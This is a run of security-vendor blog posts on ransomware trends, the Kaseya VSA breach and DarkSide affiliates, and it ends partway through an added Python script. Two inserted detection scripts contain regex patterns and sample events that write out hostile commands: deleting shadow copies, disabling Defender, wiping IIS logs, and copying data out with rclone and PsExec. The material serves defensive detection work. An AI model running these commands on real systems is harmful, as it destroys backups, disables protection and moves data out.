Cybersecurity Predictions for 2023: Looking Ahead

The last few years have been difficult for all of us, and unfortunately, 2022 did not bring the reprieve many were hoping for. Not only did we experience ongoing supply chain issues and extreme staffing shortages, but we were forced to navigate soaring inflation and economic turmoil, as well as overall political unrest.

Alongside all these problems is the growth of cyberattacks, both on individuals and organizations—and this trend is expected to continue, with increasing frequency and sophistication. And while the pandemic accelerated the digital transformation trend, it has also created new opportunities for cybercriminals to attack.

Cybersecurity continues to be a major concern for corporate America. In fact, most of today’s security and risk leaders understand that a successful cyberattack on their organization would cause major business disruption. While we continue to battle an ever-changing threat landscape, proper planning and effective solutions can reduce the potential risk and damage. The key is to be prepared for the road ahead.

Here are the four cybersecurity predictions we expect to see in the coming year:

Increased Measures for Ransomware

Given the continued rise of ransomware attacks on organizations, we expect to see an increase in the number of countries passing legislation to control payments, fines, and negotiations. This change will encourage organizations to be more proactive in their cybersecurity and ensure they follow proper procedures when an incident occurs.

With or without government involvement, it will become imperative for companies to employ solutions that help prevent attacks. For example, the May 2021 White House Executive Order on Improving the Nation’s Cybersecurity named multi-factor authentication (MFA) for securing access as an important preventative measure. Having MFA in place is also a requirement of many of today’s cyber insurance policies, as a way to control points of exposure. In general, there will be more steps taken, at both the organizational and government levels, to help ensure we stay ahead of cybercriminals.

Supply Chain Attacks

The number of cyberattacks related to third-party vendors is undoubtedly on the rise. However, only a small percentage of security and risk managers are currently checking external vendors for security exposure.

As this trend continues, organizations will begin to make cybersecurity risk a determining factor in doing business with third parties. This will range from simple oversight of a critical technology vendor to complex due diligence for mergers and acquisitions. In fact, according to research from Gartner, by 2025, 60 percent of companies will use cybersecurity risk as a determining factor when conducting third-party business transactions and engagements.

Vendor Consolidation

Consolidation of security vendors will be another major trend. Studies show that many CISOs carry a large number of tools in their security portfolio. Because a mix of tools from different vendors results in complex security operations and a larger headcount requirement, having fewer vendors and more consolidated solutions is becoming vital, and many single-vendor platforms offer better security effectiveness and efficiency for today’s businesses. As a result, organizations are building strategies to unify their security toolsets, reduce vendor fatigue and simplify their security operations.

Passwordless Authentication in Partnership with a Zero Trust Framework

Going passwordless and adopting a Zero Trust framework, which requires strict authentication for every access to a system, will continue to grow in popularity in the coming year. Studies show that more than half of the organizations surveyed already have a Zero Trust initiative in place, and more than 95 percent plan to embrace Zero Trust as a starting point for security in the next 12 to 18 months.

Additionally, passwordless authentication will make Zero Trust implementations more effective by adding layers of verification. With this approach, instead of relying on a password alone, organizations depend on stronger authentication methods, such as biometrics and AI-powered verification that weighs numerous signals before granting, re-verifying, or denying access.

Looking Ahead

Our world has changed enormously. Not only have businesses had to adjust to numerous ups and downs related to the pandemic, but they have had to adopt new technologies that support a different type of workforce. As we enter 2023, we must think about our security efforts and how we can continue to be vigilant about protecting our organizations against cybercriminals. We can use lessons learned not only to make cybersecurity predictions for 2023, but also to better help us manage risks and defend against the increasingly complex cyber threat landscape.

No matter what your cybersecurity plans are for the coming years, Proficio’s team of security experts is here to help. Our services help organizations mitigate cybersecurity risks, so you can be confident your networks are protected 24/7. To learn more about how Proficio can help your organization stay safe, contact us.

The Top Cyberattacks on Small & Medium Businesses

Not long ago, it seemed that cybercriminals mainly targeted large companies. As bigger targets, they offer more gaps to slip through, and often more data and reputation at risk. But times have changed, and many of today’s small- and medium-sized businesses (SMBs) know this is no longer the case. In fact, some reports indicate that the number of cyberattacks on SMBs is significantly higher than on larger companies. According to a 2021 study, employees of small businesses experience 350 percent more social engineering attacks than those at large businesses.

To make matters worse, it is challenging for SMBs to recover from a cyberattack given their limited resources. A recent report put the average cost of a cyberattack on an SMB at more than $2.5 million. In addition to the steep financial damage, these smaller businesses must navigate the serious reputational damage that often results from such attacks, which sometimes is too much to recover from.

With all of these things working against SMBs, it’s no wonder that cybercriminals are changing their focus. They know these business leaders tend to have limited resources when it comes to IT security, which may mean they have less rigorous defenses, as well as less time and manpower to apply toward cyber protection. And this makes them appear to be much easier targets for hackers.

But this doesn’t have to be the case. To help lessen the risk of cyberattacks on SMBs, it’s critical to understand some of the most common threats they face and how to best stay protected.

Phishing Scams

One of the most widespread and damaging threats facing small and medium businesses is phishing. Phishing reportedly accounts for 90 percent of all breaches organizations face and for more than $4 million in business losses. These scams, in which attackers impersonate a trusted contact or site, have become smarter and more targeted in recent years. Once a cybercriminal lures a user into clicking a malicious link, downloading a malicious file, or handing over sensitive information, account details, or credentials, that foothold can unlock far more of the company’s data.

To avoid these types of cyberattacks on SMBs, companies should provide their users with comprehensive cybersecurity training. Tips should include:

  • Always check that the sender’s display name and email address match, and hover over links to verify their destination before clicking
  • Confirm with the sender, through a separate channel, that they actually sent the email
  • Verify the legitimacy of suspicious emails with your IT team
  • Never post or email sensitive or personal information

Cybersecurity training for employees is a critical step, but it is also important to have your back end configured well for when an attacker does break into your organization. This includes:

  • Ensuring you consistently back up data
  • Maintaining software updates and patches
  • Using an email filtering program
  • Developing protocols to verify suspicious communications, and how users can report them (also part of employee training)

Ransomware

Ransomware is the type of malware most people are familiar with. Once it runs, it encrypts files and locks users out of their systems, then demands payment for the key to regain access. Because the affected data typically includes documents, databases, credentials, customer and payment records, and other assets the business cannot operate without, victims scramble to get back online. Ransomware targeting SMBs is commonly delivered through spam and phishing email and through attacks on exposed network services.

According to a recent study, 84 percent of SMBs are concerned about a ransomware attack impacting their business, and 60 percent are not confident–or only somewhat confident– that they can fend off a ransomware attack.

Your best offense is a strong defense. While it’s not always possible to stop these attacks, there are some things you can do to catch them before they cause too much damage. Setting up endpoint security and antivirus software is a good starting point, as long as you ensure they are kept updated. More importantly, having monitoring set up helps you catch the early signs of an attack, so you can stop the malicious behavior before it does serious damage. If you don’t have the team in-house to support this 24/7, look for a security partner who can help you improve your security defenses.

Insider Threats

The actions of current and former employees, contractors, vendors, partners, and associates can lead to devastating results if not properly managed. Many of these individuals have access to vital company data, which if in the wrong hands, can cause harm to your organization—either by accidentally clicking a malicious link or intentionally stealing or leaking company data. Studies found that 60 percent of data breaches were caused by insider threats, and the current average annual cost of an insider threat is more than $11 million.

Building a strong culture of education and cybersecurity awareness within an organization is an important step to blocking insider threats. Additionally, organizations should have a thorough new hire screening and off-boarding process, and create security policies and use cases to detect misuse of company resources.

Weak Passwords

While the advice to set a strong password has become commonplace, the number of individuals using weak passwords is still high, making this another problem that makes SMBs easy to attack. In fact, studies show that 59 percent of professionals use their name or birthdate in their password, and 43 percent regularly share their passwords.

This is why many of today’s businesses are implementing multi-factor authentication (MFA). This second layer of protection forces users to present more than a password to access business accounts. It’s not foolproof (and, surprisingly, many businesses still haven’t implemented it), but it does block most credential-based identity attacks. In addition, it is essential to implement and enforce a strong password policy: passwords of at least 12 characters, long and random rather than built from names or dates, checked against lists of known-breached passwords, and changed whenever there is evidence of compromise rather than on a fixed calendar schedule, which current NIST guidance (SP 800-63B) advises against because forced rotation pushes users toward predictable variations.

Protecting your Business

While there are many different cyberthreats out there, there are several ways you can reduce the likelihood of a cyberattack on your SMB. If you don’t have the internal resources to stay protected, Proficio can help. We tailor our security services to help SMBs mitigate the risks of cyber threats, so you can be confident your organization is protected.

To learn more about how Proficio can help your organization stay safe, contact us.

Best Practices for Endpoint Security

In today’s highly technical world, endpoint devices are everywhere. Endpoint devices, such as employee workstations, laptops, tablets, and smartphones, connect to and communicate with an organization’s network. Because they are intertwined within an organization, it often only takes successfully exploiting one endpoint for threat actors to carve a path through an organization’s network to cause harm.

Studies show that 61 percent of businesses have 1,000 or more endpoints on their networks. Endpoints are a critical part of daily business and are also targets of a wide range of cyberthreats, which is why endpoint security should be a priority for every organization.

As is often the case in cybersecurity, the best defense of endpoints is a good offense. But where do you start? We’ve put together a guide to endpoint security best practices so you can better prepare your organization.

Why Prioritize Endpoint Security?

If you think of endpoints as entryways into your network, it’s clear that securing every endpoint against malicious actors is important or you could be leaving the back – or even front – door open to cybercriminals.

For organizations offering flexible work options, the increase in mobile and remote working introduces greater risks to endpoints. As users connect to the company network and access business resources from off-premises devices or in the cloud, traditional network perimeter controls are no longer sufficient to protect company information.

A recent study found that 68 percent of surveyed companies experienced one or more endpoint attacks that successfully compromised data and/or IT infrastructure. Cybercriminals and nation-states carry out increasingly sophisticated attacks on endpoints to:

  • Access valuable assets, including trade secrets or intellectual property
  • Exfiltrate data
  • Disrupt important services

The financial and reputational impacts of cyberattacks make it imperative for companies to take a comprehensive approach to endpoint security and use effective measures that combat modern cyberthreats.

While there are many different threats to endpoints, both internal and external, here are some of the most common:

  • Ransomware/Malware
  • Unpatched Vulnerabilities
  • Fileless Attacks
  • Compromised User Accounts

Following some endpoint security best practices puts the foundations in place to protect your networks from the range of cyber threats that inundate companies daily. These include:

  • Consistent Updates
  • Endpoint Security Tools
  • Employee Awareness
  • Detection and Response

A Discussion Around the Challenges Today’s Security Officers Face | A Cyber Chat with EVOTEK – Full Episode

From budget cuts to cyberattacks, today’s CISOs must continuously stay on their toes to keep their organizations protected. On this episode of Cyber Chats, industry veterans Brad Taylor, Proficio’s CEO, and Macy Dennis, EVOTEK Chief Security Officer, sit down to discuss the challenges many Security Officers face.

This includes the increasingly complex ransomware attacks and best practices for being prepared for a cyber incident. Tune in to see what tips they provide to help keep your organization secure.

Kaseya VSA Security Breach

Overview | Kaseya VSA

On July 2, 2021, right before Americans started their long Independence Day weekend, hackers once again made their way to the top of the news headlines. This time, the victim of one of the largest ransomware attacks to date was Kaseya, a technology company that sells IT management software to third-party providers, mainly managed service providers (MSPs).

Early speculation suggested that the attack was another software supply-chain compromise. Multiple security firms and researchers have since concluded that the attackers exploited a zero-day vulnerability rather than tampering with Kaseya’s codebase to distribute the malware. The REvil/Sodinokibi ransomware operators were found to be responsible, exploiting the zero-day to remotely access internet-facing Kaseya VSA servers. Through fewer than 40 compromised VSA servers, they were able to deploy the ransomware to over a thousand enterprise networks.

What is Kaseya VSA?

Kaseya VSA (Virtual System/Server Administrator) is marketed as an endpoint management and network monitoring system that gives its clients a unified remote monitoring and management (RMM) platform. Users can remotely control end-user computers, discover and inventory a client’s infrastructure, centrally deploy software updates and patches across all endpoints, and monitor and alert on incidents across the network. This makes it a convenient solution for MSPs to remotely manage their customers’ IT infrastructure and provide IT support and cybersecurity services to multiple enterprises. By design, the VSA agent runs with administrator rights on every managed client system.

In this incident, the attacker abused Kaseya VSA’s update mechanism to push the REvil ransomware to Kaseya’s clients as if it were a legitimate agent update. This extended the blast radius beyond Kaseya’s direct VSA customers to the customers of the MSPs running those VSA systems.

Kaseya Ransomware Timeline

Figure: Timeline of how the attack affected MSP client systems

What Happened?

Various articles and researchers have concluded that the attackers leveraged standard VSA product functionality to deploy ransomware to the managed endpoints. The attacker exploited the zero-day vulnerability now tracked as CVE-2021-30116.

The Kaseya zero-day was discovered by Dutch Institute for Vulnerability Disclosure (DIVD) researcher Wietse Boonstra in early April and had been reported to Kaseya prior to its exploitation in these ransomware attacks. Unfortunately, the REvil attackers found and exploited the flaw before Kaseya was able to release a patch, resulting in this large-scale ransomware infection.

Because the incident is still under investigation and a patch is pending, full details of CVE-2021-30116 have not been disclosed to the public. Available research indicates that the vulnerability allows a remote, unauthenticated attacker to compromise the affected system by sending a specially crafted request to the application. Researchers have further concluded that the attackers bypassed authentication on the internet-facing VSA web panel, exploited an arbitrary file upload, and executed commands via SQL injection on the VSA appliance.

Evidence has also been found of executable code that disables existing user sessions, removes IIS logs, and performs other clean-up on the appliance. The attack appears to be geographically dispersed, and the impact appears to have been restricted to systems running the Kaseya software.

The malicious payload was distributed as a “Kaseya VSA Agent Hot-fix”, a fake update package pushed to customers of MSPs and to enterprise users of the on-premises version of Kaseya’s VSA remote monitoring and management platform. On endpoints that received the package, the payload evaded antivirus by side-loading a malicious DLL into an older, legitimately signed Microsoft Defender executable, so that the encryption of the local workstation ran inside a trusted, signed process (the DLL side-loading and code-signing abuse listed in the ATT&CK table below).

After compromising an MSP’s VSA server, the attackers disabled the MSP’s administrative access to the platform and used it to gain administrative access to every endpoint that VSA managed. With that access, they were observed attempting to disable Microsoft Defender real-time monitoring via PowerShell before deploying the ransomware.

REvil Ransomware

Various evidence, such as the ransom notes dropped onto infected systems, tied this incident to the REvil/Sodinokibi ransomware group. The group confirmed its involvement by claiming responsibility on its dark web leak site.

This is not the first time REvil has topped the headlines, but in this attack its operators took a different approach to ransom negotiation. REvil attacks can use multiple encrypted file extensions across a victim’s network and typically provide one decryptor that handles all of them. Here, REvil demanded a separate ransom payment for each encrypted file extension found on a victim’s network.

The attackers are willing to provide a universal decryptor for victims of the attack, but only under the condition that they are paid $70 million in Bitcoin. The value has reportedly recently been lowered to $50 million.

REvil representatives also told victims during negotiations that in this attack they had only encrypted networks and nothing more, suggesting that REvil did not steal victim data, which it normally uses as leverage during negotiation. This would also indicate that the operators had no hands-on access to victims’ networks before the mass deployment; however, the full extent of the damage to victim environments remains uncertain.

Riding the Waves

It is no surprise that when a new zero-day is disclosed or exploited by one criminal group, other threat actors ride the wave. Not long after the Kaseya attack, a malspam campaign was observed using various subject lines claiming to contain a patch for the Kaseya vulnerability. The attachment drops a Cobalt Strike beacon and likely targets users of Kaseya products. These Cobalt Strike attachments appear to be the first malware found in the wild exploiting the Kaseya situation.

MITRE ATT&CK

The following are the MITRE ATT&CK Tactics and Techniques associated with the Kaseya attacks:

Tactic | Technique
Resource Development | Obtain Capabilities: Vulnerabilities (T1588.006)
Resource Development | Obtain Capabilities: Exploits (T1588.005)
Initial Access | Exploit Public-Facing Application (T1190)
Execution | Command and Scripting Interpreter: PowerShell (T1059.001)
Persistence | Hijack Execution Flow: DLL Side-Loading (T1574.002)
Defense Evasion | Masquerading: Rename System Utilities (T1036.003)
Defense Evasion | Impair Defenses: Disable or Modify Tools (T1562.001)
Defense Evasion | Deobfuscate/Decode Files or Information (T1140)
Defense Evasion | Hijack Execution Flow: DLL Side-Loading (T1574.002)
Defense Evasion | Indicator Removal on Host: File Deletion (T1070.004)
Defense Evasion | Modify Registry (T1112)
Defense Evasion | Subvert Trust Controls: Code Signing (T1553.002)
Impact | Data Encrypted for Impact (T1486)

General Recommendations

Because the vulnerability is newly discovered, there is still considerable uncertainty about this attack and its effect on clients using Kaseya VSA. Until Kaseya releases a patch and confirms it is safe to restore operations, clients should keep all on-premises VSA servers offline.

If you use Kaseya VSA for your IT infrastructure, we strongly recommend following the guidance from Kaseya, the FBI and CISA, and reaching out to your MSP if you rely on one for IT management.

It is important to note that Proficio does not use Kaseya or any of its products. If you have questions, please do not hesitate to contact your Customer Success Manager or Security Advisor.

Lessons Learned: Ransomware Attacks in 2021

While ransomware attacks in 2021 show no sign of stopping, several high-profile incidents in the first half of the year gained swift notoriety for either the scale of damage they inflicted or the targets they focused on. Here are four of the biggest attacks, and the lesson that can be learned from each.

Colonial Pipeline

A natural place to begin is with one of the most disruptive cyberattacks ever to hit critical infrastructure in the United States. Carried out by an affiliate of the DarkSide ransomware group, this was among the most newsworthy ransomware attacks of 2021, targeting the IT environment of a pipeline system that extends from Texas to New York.

The attackers gained access through a legacy VPN account that was not protected by multi-factor authentication, using a password that had appeared in an earlier credential leak. The attack was noticed on May 7, 2021, when an employee saw a message on a control-room screen demanding a cryptocurrency payment. An operations supervisor responded by taking the unprecedented step of shutting the entire pipeline down.

Colonial Pipeline decided to pay the ransom of $4.4 million in bitcoin; in a positive turn, the FBI later recovered part of the payment. The disruption to the pipeline lasted five days before normal operations resumed.

Takeaway: Use multi-factor authentication so that even if a password becomes compromised, hackers need to provide an additional category of evidence to access a resource on your network.

Acer

Taiwanese computer manufacturer Acer became the victim of another notable ransomware attack in March 2021. It’s believed a Microsoft Exchange vulnerability provided an entry route into Acer’s network.

The REvil ransomware group demanded a $50 million payment to return stolen data, releasing samples on the dark web. It’s not publicly known whether Acer paid the ransom.

Takeaway: Hacking groups don’t keep a 9-to-5 schedule. It’s critical for organizations to use 24/7 monitoring that constantly seeks out new types of attacks, critical vulnerabilities, and suspicious behavior on the network. A dedicated security operations team can provide round-the-clock incident monitoring, detection, and response.

Sierra Wireless

Among several high-profile technology companies hit by ransomware in 2021 was the wireless communications equipment designer and manufacturer Sierra Wireless. The attack affected both the company’s internal IT systems and its corporate website.

Production at the company’s manufacturing sites was temporarily halted while the company quickly initiated measures to counter and contain the damage. While the internal network and corporate website remained affected for a few days, customer-facing products and services weren’t impacted.

Takeaway: Sierra Wireless’s swift response illustrates why rapid threat containment matters. Fast action can make the difference between an attempted intrusion and a devastating breach, which is why automated response capabilities are essential for modern organizations.

Scripps Health

Finishing things off is one of the most targeted industries: healthcare. In May 2021, a health system in our own backyard, Scripps Health in San Diego, was taken offline for almost a month by a ransomware attack.

While not much is currently known about that attack, in the same timeframe a similar attack took down Ireland’s Health Service Executive. That attack began when an employee opened a phishing email carrying a malicious attachment, and the cybercriminals demanded almost €15 million in exchange for 700 gigabytes of confidential patient data.

Takeaway: Opportunistic hackers don’t take ethical or moral considerations into account when choosing targets. Knowing the signs of a ransomware attack in its early stages is key to stopping cybercriminals before they move from initial access to encryption.

Conclusion

While the ransomware attacks in 2021 that make media headlines often involve public infrastructure, health services, and large corporations, these incidents can happen just as easily on small to medium businesses. As we often say – it’s not a matter of if you’ll be attacked, but when – so regardless of the size of your company, preparation is vital to staying safe.

DarkSide Ransomware

Overview | Darkside Ransomware

DarkSide ransomware was first observed in the wild in August 2020. It is operated as Ransomware-as-a-Service (RaaS): affiliates deploy the ransomware in exchange for a fee or a cut of the proceeds from successful ransom payments.

The DarkSide ransomware group was brought to mainstream attention due to the recent ransomware attack against Colonial Pipeline. The Proficio Threat Intelligence Team posted information and articles about the Colonial Pipeline attack in our Twitter Feed. Below, we provide more detailed findings based on our research of DarkSide ransomware.

What We Know About the DarkSide Ransomware Group

DarkSide ransomware group attacks are highly targeted, and affiliates are able to customize the ransomware executable for the specific organization they are attacking. Targeted organizations typically have the finances to pay large ransom amounts. After the attack on Colonial Pipeline, the DarkSide group publicly stated that they are apolitical and that their goal “is to make money, not create problems for society”.

However, affiliates are not allowed to attack organizations from the following sectors:

  • Healthcare
  • Funeral services
  • Education
  • Public sector
  • Non-profit organizations
  • Government sector

The DarkSide ransomware group also runs a website where it publishes data stolen from victims who refuse to pay the ransom. This is a method of further pressuring victims to pay, following a trend observed among ransomware families throughout 2020, including DoppelPaymer and REvil/Sodinokibi.

How DarkSide Ransomware Attacks Work

The initial entry method of DarkSide ransomware attacks can vary depending on the affiliate carrying out the attack. There is currently no public information on the initial entry method used in the attack on Colonial Pipeline, however example methods observed from past DarkSide ransomware attacks include:

  • Exploiting hardware/software vulnerabilities
  • Exploiting remote access services (such as RDP)
  • Access victim’s network using legitimate credentials, obtained by:
    • Phishing attacks
    • Password attacks (such as password spraying)
    • Purchasing from a third-party source

After gaining access to the victim’s environment, the attackers will move laterally throughout the network and perform internal reconnaissance to gather information before encrypting data. The following have been observed being utilized in previous attacks for reconnaissance/lateral movement:

  • PSExec
  • RDP connections
  • SSH
  • Mimikatz
  • Cobalt Strike
  • BloodHound

Information gathered during internal reconnaissance includes credentials stored in files, in memory and on domain controllers; the stolen credentials are then used to access privileged accounts. PowerShell commands are executed to delete Volume Shadow Copies, wiping local backups and file snapshots so the victim cannot recover without paying.
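The commands named in this section (shadow copy deletion from PowerShell, Rclone exfiltration and PsExec deployment) and the Defender-disabling PowerShell, IIS log deletion and side-loaded Defender binary described in the Kaseya write-up above all surface in process-creation telemetry. As an added example that is not part of the original post, DarkSide tooling or any vendor product, the following Python rule set matches those behaviors over a constructed set of process-creation records (Sysmon Event ID 1 or Windows Event 4688 with command-line logging is assumed as the source). The sample events, host names and file paths are made up; the Defender engine binary name MsMpEng.exe and its install directories are assumptions to adjust for your platform version.

```python
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 or Windows 4688 with command-line auditing)."""
    host: str
    user: str
    image: str     # full path of the new process
    cmdline: str   # its full command line


# Directories the Defender engine binary legitimately runs from. This is an assumption for the
# side-loading check; the Platform folder contains a version-named subdirectory.
DEFENDER_DIRS = (
    "c:\\program files\\windows defender",
    "c:\\programdata\\microsoft\\windows defender\\platform",
)

# Any Set-MpPreference call that turns a Defender protection feature off (-Disable... $true).
_DEFENDER_DISABLE = re.compile(r"set-mppreference\b.*-disable\w+\s+\$?true", re.I)
# Deletion of IIS logs, the clean-up step seen on the VSA appliance.
_IIS_LOG_WIPE = re.compile(r"(remove-item|\bdel\b|\brd\b|\brmdir\b|\berase\b).*inetpub\\logs", re.I)
# Volume Shadow Copy deletion via vssadmin, wmic, or the WMI class from PowerShell.
_SHADOW_DELETE = re.compile(
    r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete|win32_shadowcopy.*\.delete\(\)",
    re.I,
)
# Rclone pushing data to a remote, and PsExec launching a binary on another host.
_RCLONE = re.compile(r"\brclone(\.exe)?\s+(copy|sync|move)\b", re.I)
_PSEXEC = re.compile(r"\bpsexec(64)?(\.exe)?\s.*\\\\\S+", re.I)


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def _defender_out_of_place(ev: ProcEvent) -> bool:
    """MsMpEng.exe (the Defender engine, assumed name) started from a directory it is never installed in."""
    if _basename(ev.image) != "msmpeng.exe":
        return False
    directory = ntpath.dirname(ev.image).lower()
    return not any(directory.startswith(ok) for ok in DEFENDER_DIRS)


RULES = [
    ("defender_protection_disabled",
     lambda ev: _basename(ev.image) in ("powershell.exe", "pwsh.exe") and bool(_DEFENDER_DISABLE.search(ev.cmdline))),
    ("iis_logs_deleted", lambda ev: bool(_IIS_LOG_WIPE.search(ev.cmdline))),
    ("defender_binary_out_of_place", _defender_out_of_place),
    ("shadow_copies_deleted", lambda ev: bool(_SHADOW_DELETE.search(ev.cmdline))),
    ("rclone_transfer", lambda ev: bool(_RCLONE.search(ev.cmdline))),
    ("psexec_remote_launch", lambda ev: bool(_PSEXEC.search(ev.cmdline))),
]


def detect(events):
    """Return (rule_name, event) for every event that matches a rule, in input order."""
    return [(name, ev) for ev in events for name, pred in RULES if pred(ev)]


# Constructed sample telemetry (not real logs): benign administration mixed with the steps above.
SAMPLE_EVENTS = [
    ProcEvent("WS01", "CORP\\admin", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -Command "Get-MpPreference"'),
    ProcEvent("WS01", "NT AUTHORITY\\SYSTEM", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true"'),
    ProcEvent("VSA01", "NT AUTHORITY\\SYSTEM", r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c del /q C:\inetpub\logs\LogFiles\W3SVC1\*.log"),
    ProcEvent("WS01", "NT AUTHORITY\\SYSTEM", r"C:\Windows\MsMpEng.exe", r"C:\Windows\MsMpEng.exe"),
    ProcEvent("WS02", "NT AUTHORITY\\SYSTEM", r"C:\Program Files\Windows Defender\MsMpEng.exe",
              r"C:\Program Files\Windows Defender\MsMpEng.exe"),
    ProcEvent("FS01", "CORP\\svc_backup", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}"'),
    ProcEvent("FS01", "CORP\\svc_backup", r"C:\Users\Public\rclone.exe",
              r"rclone.exe copy C:\Shares\Finance remote:staging --transfers 16"),
    ProcEvent("JUMP01", "CORP\\admin", r"C:\Tools\PsExec.exe",
              r"PsExec.exe \\FS01 -accepteula -s -d C:\Windows\Temp\update.exe"),
    ProcEvent("FS01", "CORP\\admin", r"C:\Windows\System32\vssadmin.exe", "vssadmin.exe list shadows"),
]

if __name__ == "__main__":
    for name, ev in detect(SAMPLE_EVENTS):
        print(f"{name:30s} {ev.host:7s} {ev.user:22s} {ev.cmdline}")
```

Run stand-alone, the script flags six of the nine sample events and leaves the benign Get-MpPreference, the Defender engine in its real install path, and the read-only vssadmin listing alone. The rules are deliberately behavioral rather than hash-based: an affiliate can recompile the encryptor, but it still has to stop Defender, kill the shadow copies, and move the data out, and those steps look the same from one affiliate to the next.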

Stolen data is exfiltrated before deploying DarkSide ransomware to encrypt the victim’s files. Upon successful encryption, the ransomware appends a victim’s ID as an extension to file names. A ransom note with the naming convention of “README.[victim’s_ID].TXT” is dropped onto the victim’s device with instructions for the victim to access a Tor website using a Tor browser to pay the ransom – and if unpaid, they threaten to publish the stolen data.

Figure 1 - Example of a DarkSide ransom note

Known DarkSide Affiliates

As previously mentioned, DarkSide ransomware can be used by different affiliates, and as such, different DarkSide attacks can utilize different tools and tactics depending on the affiliate. Below are examples of attack flows from three affiliates identified by FireEye.

UNC2628

This affiliate group is suspected to have used a password spraying attack against the victim’s VPN to gain initial access into the environment. The attackers utilized Cobalt Strike beacons for C2 communications and Mimikatz for credential theft. Lateral movement was performed using RDP connections and Cobalt Strike.

The attackers exfiltrated stolen data to cloud storage using Rclone, a command line utility for managing files on cloud storage services. DarkSide ransomware was then deployed using PsExec.

The following is a MITRE ATT&CK table of this affiliate’s attack:

Tactic                              Technique
Credential Access [TA0006]          Brute Force: Password Spraying [T1110.003]
Initial Access [TA0001]             Valid Accounts [T1078]
Resource Development [TA0042]       Obtain Capabilities: Tool [T1588.002]
Credential Access [TA0006]          OS Credential Dumping [T1003]
Lateral Movement [TA0008]           Remote Services: Remote Desktop Protocol [T1021.001]
Command and Control [TA0011]        Application Layer Protocol: Web Protocols [T1071.001]
Execution [TA0002]                  Command and Scripting Interpreter [T1059]
Execution [TA0002]                  System Services: Service Execution [T1569.002]
Exfiltration [TA0010]               Exfiltration Over Web Service: Exfiltration to Cloud Storage [T1567.002]
Impact [TA0040]                     Data Encrypted for Impact [T1486]

UNC2659

This affiliate group gains initial access by exploiting the SonicWall vulnerability CVE-2021-20016. After gaining access to the victim’s environment, the attackers download TeamViewer from the official website onto the victim host to establish persistence within the environment.

This group was also observed using Rclone for data exfiltration, likewise downloaded from the official website onto the victim host. The stolen data is exfiltrated to cloud storage.

The following is a MITRE ATT&CK table of this affiliate’s attack:

Tactic                              Technique
Initial Access [TA0001]             Exploit Public-Facing Application
Resource Development [TA0042]       Obtain Capabilities: Tool [T1588.002]
Command and Control [TA0011]        Remote Access Software [T1219]
Execution [TA0002]                  Command and Scripting Interpreter [T1059]
Exfiltration [TA0010]               Exfiltration Over Web Service: Exfiltration to Cloud Storage [T1567.002]
Impact [TA0040]                     Data Encrypted for Impact [T1486]

UNC2465

This affiliate group used a backdoor named “SMOKEDHAM” to gain access to the victim’s environment. The backdoor is delivered via phishing emails and hosted on legitimate services such as Google Drive and Dropbox. Advanced IP Scanner, BloodHound and RDP were used for internal reconnaissance, and Mimikatz was used for credential theft.

The attackers also used the ngrok utility to bypass firewalls and expose remote service ports such as RDP to the Internet. The DarkSide ransomware was deployed using PsExec and scheduled tasks.

The following is a MITRE ATT&CK table of this affiliate’s attack:

Tactic                              Technique
Initial Access [TA0001]             Phishing: Spearphishing Link [T1566.002]
Resource Development [TA0042]       Obtain Capabilities: Tool [T1588.002]
Lateral Movement [TA0008]           Remote Services: Remote Desktop Protocol [T1021.001]
Credential Access [TA0006]          OS Credential Dumping [T1003]
Defense Evasion                     Impair Defenses [T1562]
Execution [TA0002]                  System Services: Service Execution [T1569.002]
Impact [TA0040]                     Data Encrypted for Impact [T1486]

General Recommendations

Although DarkSide ransomware attacks can involve different tactics and tools depending on which threat group is making use of the RaaS, the tactics, techniques and tools deployed are not completely different, as the affiliates share the common DarkSide platform. The variety of tactics and techniques deployed should serve as a clear indication that focusing on any single threat will not provide adequate coverage when it comes to protecting an organization from the broad array of security threats.

EDR solutions provide valuable visibility into endpoints and important systems, so they should play a big role in dealing with ransomware attacks. We also recommend a defense-in-depth approach to securing your network and environment, including proper segmentation and security device visibility between network segments, particularly critical ones. A traditional security architecture that focuses solely on securing the perimeter is inadequate against modern persistent threats, although perimeter controls still play an important part.

An organization with proper network segmentation and security device coverage can then monitor for the following general suspicious indicators and activities to identify potential DarkSide ransomware attacks:

  • Attacks on VPN infrastructure (exploiting vulnerabilities or through password spraying attacks)
  • Phishing emails
  • Deployment, use and download of common exploit and bypass tools like Mimikatz, Cobalt Strike and BloodHound
  • Unauthorized deployment, use and download of remote access tools (TeamViewer, Remote Desktop, etc.)
  • Installation of suspicious or unknown services
  • Data exfiltration to cloud storage
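As an added example that is not part of the original post, the following Python script runs the indicators listed above (shadow copy deletion, PsExec service installation, Mimikatz, Rclone copies to cloud storage, unauthorized TeamViewer, and the README.[victim’s_ID].TXT ransom note) over a constructed, hypothetical EDR export and groups the hits per host. The log format, host names and the ransom-note ID pattern are assumptions; the technique IDs are the ones in the affiliate tables above.

```python
import re

# Constructed sample EDR export in a hypothetical "host | image | command line"
# format; none of these lines come from the original post.
SAMPLE_LOGS = [
    "WS01 | powershell.exe | Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_.Delete() }",
    "WS01 | vssadmin.exe | vssadmin delete shadows /all /quiet",
    "SRV02 | services.exe | PSEXESVC.exe service installed",
    "SRV02 | cmd.exe | C:\\Temp\\mimikatz.exe",
    "WS03 | rclone.exe | rclone copy D:\\Finance remote:exfil --transfers 32",
    "WS03 | TeamViewer.exe | TeamViewer.exe started by user bob",
    "WS01 | explorer.exe | created file C:\\Users\\bob\\README.a1b2c3d4.TXT",
    "WS04 | notepad.exe | notepad.exe C:\\Users\\alice\\notes.txt",
]

# (rule name, ATT&CK technique ID from the affiliate tables above, regex).
# The ransom-note ID format is an assumption; the post only gives README.[ID].TXT.
RULES = [
    ("shadow copy deletion", "T1059",
     re.compile(r"vssadmin\s+delete\s+shadows|Win32_Shadowcopy.*Delete\(\)", re.I)),
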